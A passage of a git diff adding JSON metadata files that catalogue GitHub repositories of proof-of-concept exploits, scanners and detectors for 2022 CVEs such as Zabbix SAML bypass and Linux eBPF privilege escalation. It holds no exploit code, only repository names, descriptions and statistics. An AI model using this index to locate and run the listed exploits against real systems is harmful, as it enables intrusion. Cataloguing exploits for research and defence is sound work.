"https:\/\/avatars.githubusercontent.com\/u\/86941613?v=4", + "html_url": "https:\/\/github.com\/wr0x00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wr0x00\/cve-2022-23131", + "description": null, + "fork": false, + "created_at": "2023-01-07T14:09:40Z", + "updated_at": "2024-10-01T19:30:20Z", + "pushed_at": "2023-01-07T14:22:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 586722779, + "name": "CVE-2022-23131_exp", + "full_name": "Arrnitage\/CVE-2022-23131_exp", + "owner": { + "login": "Arrnitage", + "id": 48816467, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48816467?v=4", + "html_url": "https:\/\/github.com\/Arrnitage", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Arrnitage\/CVE-2022-23131_exp", + "description": "zabbix saml bypass", + "fork": false, + "created_at": "2023-01-09T04:10:08Z", + "updated_at": "2023-02-09T03:20:18Z", + "pushed_at": "2023-01-09T04:10:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 604432382, + "name": "Zabbix-SAML-SSO-_CVE-2022-23131", + "full_name": "clearcdq\/Zabbix-SAML-SSO-_CVE-2022-23131", + "owner": { + "login": "clearcdq", + "id": 81290636, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81290636?v=4", + "html_url": "https:\/\/github.com\/clearcdq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/clearcdq\/Zabbix-SAML-SSO-_CVE-2022-23131", + "description": null, + "fork": false, + "created_at": "2023-02-21T03:30:20Z", + "updated_at": "2023-03-20T07:44:06Z", + "pushed_at": "2023-02-21T03:45:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 709195408, + "name": "CVE-2022-23131", + "full_name": "r10lab\/CVE-2022-23131", + "owner": { + "login": "r10lab", + "id": 92838079, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92838079?v=4", + "html_url": "https:\/\/github.com\/r10lab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r10lab\/CVE-2022-23131", + "description": null, + "fork": false, + "created_at": "2023-10-24T08:11:06Z", + "updated_at": "2023-10-24T08:12:16Z", + "pushed_at": "2023-10-24T08:13:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 859400181, + "name": "CVE-2022-23131", + "full_name": "fork-bombed\/CVE-2022-23131", + "owner": { + "login": "fork-bombed", + "id": 57873842, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57873842?v=4", + "html_url": "https:\/\/github.com\/fork-bombed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fork-bombed\/CVE-2022-23131", + "description": "CVE-2022-23131 Zabbix Server SAML authentication exploit", + "fork": false, + "created_at": "2024-09-18T15:42:26Z", + "updated_at": "2024-09-18T16:20:37Z", + "pushed_at": "2024-09-18T15:58:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 878490904, + "name": "CVE-2022-23131", + "full_name": "davidzzo23\/CVE-2022-23131", + "owner": { + "login": "davidzzo23", + "id": 156780826, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156780826?v=4", + "html_url": "https:\/\/github.com\/davidzzo23", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/davidzzo23\/CVE-2022-23131", + "description": "Zabbix Frontend Authentication Bypass Vulnerability", + "fork": false, + "created_at": "2024-10-25T13:44:21Z", + "updated_at": "2024-10-30T12:47:46Z", + "pushed_at": "2024-10-25T14:00:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23222.json b/2022/CVE-2022-23222.json new file mode 100644 index 0000000000..2632c5b3fe --- /dev/null +++ b/2022/CVE-2022-23222.json @@ -0,0 +1,126 @@ +[ + { + "id": 500674038, + "name": "CVE-2022-23222", + "full_name": "tr3ee\/CVE-2022-23222", + "owner": { + "login": "tr3ee", + "id": 26628940, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26628940?v=4", + "html_url": "https:\/\/github.com\/tr3ee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tr3ee\/CVE-2022-23222", + "description": "CVE-2022-23222: Linux Kernel eBPF Local Privilege Escalation", + "fork": false, + "created_at": "2022-06-07T03:20:23Z", + "updated_at": "2024-11-26T16:35:53Z", + "pushed_at": "2022-06-07T03:41:13Z", + "stargazers_count": 560, + "watchers_count": 560, + "has_discussions": false, + "forks_count": 95, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 95, + "watchers": 560, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 506271997, + "name": "CVE-2022-23222-POC", + "full_name": "PenteraIO\/CVE-2022-23222-POC", + "owner": { + "login": "PenteraIO", + "id": 60603602, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60603602?v=4", + "html_url": "https:\/\/github.com\/PenteraIO", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PenteraIO\/CVE-2022-23222-POC", + "description": null, + "fork": false, + "created_at": "2022-06-22T14:01:50Z", + "updated_at": "2024-04-27T08:51:21Z", + "pushed_at": "2022-06-23T15:06:56Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 512269234, + "name": "CVE-2022-23222", + "full_name": "FridayOrtiz\/CVE-2022-23222", + "owner": { + "login": "FridayOrtiz", + "id": 29507827, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29507827?v=4", + "html_url": "https:\/\/github.com\/FridayOrtiz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FridayOrtiz\/CVE-2022-23222", + "description": "CVE-2022-23222, managed with Rust.", + "fork": false, + "created_at": "2022-07-09T19:28:46Z", + "updated_at": "2022-09-01T21:21:15Z", + "pushed_at": "2022-08-30T20:56:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 577090166, + "name": "ProjetSecu", + "full_name": "LeoMarche\/ProjetSecu", + "owner": { + "login": "LeoMarche", + "id": 57867045, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57867045?v=4", + "html_url": "https:\/\/github.com\/LeoMarche", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LeoMarche\/ProjetSecu", + "description": "work on CVE-2022-23222.", + "fork": false, + "created_at": "2022-12-11T23:33:14Z", + "updated_at": "2023-03-11T10:09:49Z", + "pushed_at": "2022-12-16T15:23:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23253.json b/2022/CVE-2022-23253.json new file mode 100644 index 0000000000..a5b248eb13 --- /dev/null +++ b/2022/CVE-2022-23253.json @@ -0,0 +1,33 @@ +[ + { + "id": 491521893, + "name": "CVE-2022-23253-PoC", + "full_name": "nettitude\/CVE-2022-23253-PoC", + "owner": { + "login": "nettitude", + "id": 11998401, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11998401?v=4", + "html_url": "https:\/\/github.com\/nettitude", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nettitude\/CVE-2022-23253-PoC", + "description": "CVE-2022-23253 PoC", + "fork": false, + "created_at": "2022-05-12T13:18:47Z", + "updated_at": "2024-10-26T14:20:43Z", + "pushed_at": "2022-05-23T11:45:12Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23270.json b/2022/CVE-2022-23270.json new file mode 100644 index 0000000000..5c29d26d7e --- /dev/null +++ b/2022/CVE-2022-23270.json @@ -0,0 +1,33 @@ +[ + { + "id": 490686432, + "name": "CVE-2022-23270-PPTP", + "full_name": "corelight\/CVE-2022-23270-PPTP", + "owner": { + "login": "corelight", + "id": 21672558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4", + "html_url": "https:\/\/github.com\/corelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corelight\/CVE-2022-23270-PPTP", + "description": "A Zeek package to detect CVE-2022-23270, a PPTP vulnerability in Windows.", + "fork": false, + "created_at": "2022-05-10T12:27:26Z", + "updated_at": "2023-08-19T06:06:41Z", + "pushed_at": "2022-05-11T18:45:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 11 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23277.json b/2022/CVE-2022-23277.json new file mode 100644 index 0000000000..7a39bd5a3a --- /dev/null +++ b/2022/CVE-2022-23277.json @@ -0,0 +1,33 @@ +[ + { + "id": 550883583, + "name": "CVE-2022-23277", + "full_name": "7BitsTeam\/CVE-2022-23277", + "owner": { + "login": "7BitsTeam", + "id": 107024599, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107024599?v=4", + "html_url": "https:\/\/github.com\/7BitsTeam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/7BitsTeam\/CVE-2022-23277", + "description": "CVE-2022-23277 POC to write a webshell to aspnet_client", + "fork": false, + "created_at": "2022-10-13T13:35:18Z", + "updated_at": "2024-06-27T08:08:54Z", + "pushed_at": "2022-10-24T15:01:06Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23303.json b/2022/CVE-2022-23303.json new file mode 100644 index 0000000000..c22903b0e0 --- /dev/null +++ b/2022/CVE-2022-23303.json @@ -0,0 +1,33 @@ +[ + { + "id": 595001088, + "name": "hostapd_mirror", + "full_name": "skulkarni-mv\/hostapd_mirror", + "owner": { + "login": "skulkarni-mv", + "id": 117360244, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117360244?v=4", + "html_url": "https:\/\/github.com\/skulkarni-mv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skulkarni-mv\/hostapd_mirror", + "description": "mirror of https:\/\/w1.fi\/cgit\/hostap\/ till 30\/01\/2023 for CVE-2022-23303\/4 - c22", + "fork": false, + "created_at": "2023-01-30T07:22:34Z", + "updated_at": "2023-09-13T12:10:22Z", + "pushed_at": "2023-02-01T06:29:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23305.json b/2022/CVE-2022-23305.json new file mode 100644 index 0000000000..368815f85d --- /dev/null +++ b/2022/CVE-2022-23305.json @@ -0,0 +1,116 @@ +[ + { + "id": 438418716, + "name": "log4shell-finder", + "full_name": "HynekPetrak\/log4shell-finder", + "owner": { + "login": "HynekPetrak", + "id": 8593983, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8593983?v=4", + "html_url": "https:\/\/github.com\/HynekPetrak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HynekPetrak\/log4shell-finder", + "description": "Fastest filesystem scanner for log4shell (CVE-2021-44228, CVE-2021-45046) and other vulnerable (CVE-2017-5645, CVE-2019-17571, CVE-2022-23305, CVE-2022-23307 ... ) instances of log4j library. Excellent performance and low memory footprint.", + "fork": false, + "created_at": "2021-12-14T22:27:14Z", + "updated_at": "2024-09-10T05:00:03Z", + "pushed_at": "2023-06-21T11:37:03Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-5645", + "cve-2019-17571", + "cve-2020-9488", + "cve-2021-4104", + "cve-2021-42550", + "cve-2021-44228", + "cve-2021-44832", + "cve-2021-45046", + "cve-2021-45105", + "cve-2022-23302", + "cve-2022-23305", + "cve-2022-23307", + "log4j", + "log4j2", + "log4shell", + "scanner", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 14, + "watchers": 38, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 450360735, + "name": "CVE-2022-RCE", + "full_name": "AlphabugX\/CVE-2022-RCE", + "owner": { + "login": "AlphabugX", + "id": 27001865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27001865?v=4", + "html_url": "https:\/\/github.com\/AlphabugX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AlphabugX\/CVE-2022-RCE", + "description": "test 反向辣鸡数据投放 CVE-2022-23305 工具 利用 教程 Exploit POC ", + "fork": false, + "created_at": "2022-01-21T05:07:59Z", + "updated_at": "2022-11-05T22:58:02Z", + "pushed_at": "2022-01-21T05:21:25Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-" + ], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 670307374, + "name": "CVE-2022-23305_POC", + "full_name": "tkomlodi\/CVE-2022-23305_POC", + "owner": { + "login": "tkomlodi", + "id": 6026319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6026319?v=4", + "html_url": "https:\/\/github.com\/tkomlodi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tkomlodi\/CVE-2022-23305_POC", + "description": "CVE-2022-23305 Log4J JDBCAppender SQl injection POC ", + "fork": false, + "created_at": "2023-07-24T18:52:15Z", + "updated_at": "2024-05-16T10:33:38Z", + "pushed_at": "2023-07-24T19:47:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2333.json b/2022/CVE-2022-2333.json new file mode 100644 index 0000000000..0f25f7cb46 --- /dev/null +++ b/2022/CVE-2022-2333.json @@ -0,0 +1,33 @@ +[ + { + "id": 485320126, + "name": "CVE-2022-2333", + "full_name": "shirouQwQ\/CVE-2022-2333", + "owner": { + "login": "shirouQwQ", + "id": 104356092, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104356092?v=4", + "html_url": "https:\/\/github.com\/shirouQwQ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shirouQwQ\/CVE-2022-2333", + "description": "SXF VPN RCE", + "fork": false, + "created_at": "2022-04-25T10:13:40Z", + "updated_at": "2024-09-17T12:42:06Z", + "pushed_at": "2022-04-25T10:26:28Z", + "stargazers_count": 52, + "watchers_count": 52, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 52, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23342.json b/2022/CVE-2022-23342.json new file mode 100644 index 0000000000..d200ff1447 --- /dev/null +++ b/2022/CVE-2022-23342.json @@ -0,0 +1,33 @@ +[ + { + "id": 504654474, + "name": "CVE-2022-23342", + "full_name": "InitRoot\/CVE-2022-23342", + "owner": { + "login": "InitRoot", + "id": 954507, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/954507?v=4", + "html_url": "https:\/\/github.com\/InitRoot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/InitRoot\/CVE-2022-23342", + "description": null, + "fork": false, + "created_at": "2022-06-17T19:46:45Z", + "updated_at": "2022-06-18T10:48:39Z", + "pushed_at": "2022-06-17T19:48:01Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23361.json b/2022/CVE-2022-23361.json new file mode 100644 index 0000000000..27ad23116f --- /dev/null +++ b/2022/CVE-2022-23361.json @@ -0,0 +1,33 @@ +[ + { + "id": 464985298, + "name": "CVE-2022-23361", + "full_name": "ViNi0608\/CVE-2022-23361", + "owner": { + "login": "ViNi0608", + "id": 59651556, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59651556?v=4", + "html_url": "https:\/\/github.com\/ViNi0608", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ViNi0608\/CVE-2022-23361", + "description": "CVE-2022-23361", + "fork": false, + "created_at": "2022-03-01T17:08:19Z", + "updated_at": "2022-03-04T06:27:01Z", + "pushed_at": "2022-03-09T15:20:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23378.json b/2022/CVE-2022-23378.json new file mode 100644 index 0000000000..9169dc33d7 --- /dev/null +++ b/2022/CVE-2022-23378.json @@ -0,0 +1,33 @@ +[ + { + "id": 448138999, + "name": "CVE-2022-23378", + "full_name": "TheGetch\/CVE-2022-23378", + "owner": { + "login": "TheGetch", + "id": 7243819, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7243819?v=4", + "html_url": "https:\/\/github.com\/TheGetch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheGetch\/CVE-2022-23378", + "description": "Authenticated reflected XSS in TastyIgniter version v3.2.2.", + "fork": false, + "created_at": "2022-01-14T23:54:36Z", + "updated_at": "2022-04-19T19:10:21Z", + "pushed_at": "2022-02-16T14:36:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23529.json b/2022/CVE-2022-23529.json new file mode 100644 index 0000000000..895decb14f --- /dev/null +++ b/2022/CVE-2022-23529.json @@ -0,0 +1,64 @@ +[ + { + "id": 587705478, + "name": "CVE-2022-23529-lab", + "full_name": "despossivel\/CVE-2022-23529-lab", + "owner": { + "login": "despossivel", + "id": 10657158, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10657158?v=4", + "html_url": "https:\/\/github.com\/despossivel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/despossivel\/CVE-2022-23529-lab", + "description": null, + "fork": false, + "created_at": "2023-01-11T11:46:22Z", + "updated_at": "2023-01-11T11:46:22Z", + "pushed_at": "2023-01-11T11:46:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 598042130, + "name": "CVE-2022-23529-PoC", + "full_name": "hackintoanetwork\/CVE-2022-23529-PoC", + "owner": { + "login": "hackintoanetwork", + "id": 83481196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83481196?v=4", + "html_url": "https:\/\/github.com\/hackintoanetwork", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hackintoanetwork\/CVE-2022-23529-PoC", + "description": "CVE-2022-23529-PoC", + "fork": false, + "created_at": "2023-02-06T09:19:20Z", + "updated_at": "2023-02-06T09:18:59Z", + "pushed_at": "2023-02-04T10:16:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23614.json b/2022/CVE-2022-23614.json new file mode 100644 index 0000000000..dfe6afcbe6 --- /dev/null +++ b/2022/CVE-2022-23614.json @@ -0,0 +1,68 @@ +[ + { + "id": 515132707, + "name": "CVE-2022-23614", + "full_name": "davwwwx\/CVE-2022-23614", + "owner": { + "login": "davwwwx", + "id": 26136505, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26136505?v=4", + "html_url": "https:\/\/github.com\/davwwwx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/davwwwx\/CVE-2022-23614", + "description": "PoC for CVE-2022-23614 (Twig sort filter code execution\/sandbox bypass)", + "fork": false, + "created_at": "2022-07-18T10:14:50Z", + "updated_at": "2023-10-22T17:49:58Z", + "pushed_at": "2022-07-18T19:36:30Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-23614", + "php", + "twig" + ], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 662215491, + "name": "CVE-2022-23614", + "full_name": "4rtamis\/CVE-2022-23614", + "owner": { + "login": "4rtamis", + "id": 62891170, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62891170?v=4", + "html_url": "https:\/\/github.com\/4rtamis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/4rtamis\/CVE-2022-23614", + "description": "Proof of concept for CVE-2022-23614 (command injection in Twig)", + "fork": false, + "created_at": "2023-07-04T15:52:50Z", + "updated_at": "2023-07-04T16:57:04Z", + "pushed_at": "2023-07-04T16:57:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23642.json b/2022/CVE-2022-23642.json new file mode 100644 index 0000000000..08617505f4 --- /dev/null +++ b/2022/CVE-2022-23642.json @@ -0,0 +1,33 @@ +[ + { + "id": 501921714, + "name": "CVE-2022-23642", + "full_name": "Altelus1\/CVE-2022-23642", + "owner": { + "login": "Altelus1", + "id": 20337489, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20337489?v=4", + "html_url": "https:\/\/github.com\/Altelus1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Altelus1\/CVE-2022-23642", + "description": "PoC for Sourcegraph Gitserver < 3.37.0 RCE (CVE-2022-23642)", + "fork": false, + "created_at": "2022-06-10T06:12:15Z", + "updated_at": "2024-08-12T20:24:00Z", + "pushed_at": "2022-06-10T06:13:50Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23648.json b/2022/CVE-2022-23648.json new file mode 100644 index 0000000000..946a360ba2 --- /dev/null +++ b/2022/CVE-2022-23648.json @@ -0,0 +1,33 @@ +[ + { + "id": 474143968, + "name": "CVE-2022-23648-POC", + "full_name": "raesene\/CVE-2022-23648-POC", + "owner": { + "login": "raesene", + "id": 68317, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68317?v=4", + "html_url": "https:\/\/github.com\/raesene", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/raesene\/CVE-2022-23648-POC", + "description": "POC for CVE-2022-23648", + "fork": false, + "created_at": "2022-03-25T19:43:59Z", + "updated_at": "2024-11-05T04:01:41Z", + "pushed_at": "2022-03-29T09:55:15Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 36, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23731.json b/2022/CVE-2022-23731.json new file mode 100644 index 0000000000..2439327592 --- /dev/null +++ b/2022/CVE-2022-23731.json @@ -0,0 +1,45 @@ +[ + { + "id": 441808910, + "name": "WAMpage", + "full_name": "DavidBuchanan314\/WAMpage", + "owner": { + "login": "DavidBuchanan314", + "id": 13520633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13520633?v=4", + "html_url": "https:\/\/github.com\/DavidBuchanan314", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DavidBuchanan314\/WAMpage", + "description": "WAMpage - A WebOS root LPE exploit chain (CVE-2022-23731)", + "fork": false, + "created_at": "2021-12-26T04:29:09Z", + "updated_at": "2024-10-14T13:59:41Z", + "pushed_at": "2022-03-19T16:24:28Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "arm", + "cve-2022-23731", + "exploit", + "javascript", + "lg-webos", + "lg-webos-tv", + "lpe", + "python", + "v8", + "webos", + "webos-tv" + ], + "visibility": "public", + "forks": 8, + "watchers": 47, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23773.json b/2022/CVE-2022-23773.json new file mode 100644 index 0000000000..93b6dd5daf --- /dev/null +++ b/2022/CVE-2022-23773.json @@ -0,0 +1,95 @@ +[ + { + "id": 537536294, + "name": "CVE-2022-23773-repro", + "full_name": "danbudris\/CVE-2022-23773-repro", + "owner": { + "login": "danbudris", + "id": 11739241, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11739241?v=4", + "html_url": "https:\/\/github.com\/danbudris", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/danbudris\/CVE-2022-23773-repro", + "description": "PoC repro of CVE-2022-23773 in Go", + "fork": false, + "created_at": "2022-09-16T16:28:35Z", + "updated_at": "2022-09-17T07:31:56Z", + "pushed_at": "2022-09-16T16:28:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 537537002, + "name": "CVE-2022-23773-repro-target", + "full_name": "danbudris\/CVE-2022-23773-repro-target", + "owner": { + "login": "danbudris", + "id": 11739241, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11739241?v=4", + "html_url": "https:\/\/github.com\/danbudris", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/danbudris\/CVE-2022-23773-repro-target", + "description": null, + "fork": false, + "created_at": "2022-09-16T16:30:29Z", + "updated_at": "2022-09-16T16:34:02Z", + "pushed_at": "2022-09-16T17:36:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 615996454, + "name": "CVE-2022-23773-Reproduce", + "full_name": "YouShengLiu\/CVE-2022-23773-Reproduce", + "owner": { + "login": "YouShengLiu", 